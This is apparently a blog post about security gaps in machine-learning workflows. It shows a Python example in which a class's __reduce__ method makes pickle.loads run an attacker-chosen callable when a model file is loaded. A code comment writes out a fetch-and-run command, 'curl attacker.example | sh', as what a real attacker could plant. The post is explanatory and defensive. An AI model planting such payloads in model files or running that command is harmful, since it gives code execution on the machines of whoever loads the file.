One of the biggest advantages I have had throughout my career was working in different types of companies, whether in consulting or in holding-type companies.
When you're at a conference, the first thing you do is certainly go to the main talks: watch the presentations from big companies, look for the big case studies, hang out with the authors of great papers stating the SOTA, and so on. This is the safest path, and most of those cases will probably end up in press releases discussed in the media or as the subject of blog posts, so you get access to them before almost everyone else. However, one thing that I think is very underestimated at conferences is the workshops.
Some weeks ago, during a security training for developers given by Marcus from Hackmanit (by the way, it's a very good course that covers topics ranging from web development to NoSQL vulnerabilities and defensive coding), we discussed some white-box attacks on web applications (i.e. attacks where the offender has internal access to the object), and I got curious to check whether similar vulnerabilities exist in ML models. After running a simple script using Scikit-Learn, I noticed that there are some latent vulnerabilities, not only in the objects themselves but also regarding the lack of a proper security mindset when we develop ML models. But first, let's check a simple example.
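To make the white-box idea concrete, here is a minimal sketch (my own illustration, not the script from the training) of why loading a serialized model is already an attack surface: Python's `pickle`, which Scikit-Learn models are commonly saved with, will execute an arbitrary callable defined by the object's `__reduce__` method at load time. The `MaliciousModel` class below is a hypothetical stand-in for a tampered model file.

```python
import pickle

# Pickle records the tuple returned by __reduce__ when serializing;
# unpickling then CALLS that callable with the given arguments.
class MaliciousModel:
    def __reduce__(self):
        # Harmless stand-in: a real attacker could return something
        # like (os.system, ("curl attacker.example | sh",)) instead.
        return (list, ("pwn",))

payload = pickle.dumps(MaliciousModel())

# The victim thinks they are loading a trained model, but
# pickle.loads runs the attacker's callable instead.
obj = pickle.loads(payload)
print(obj)  # ['p', 'w', 'n'] -- not a model at all
```

In other words, anyone who can write to the file holding your model has code execution on every machine that loads it, which is why "just pickle the model" deserves the same scrutiny as any other deserialization of untrusted input.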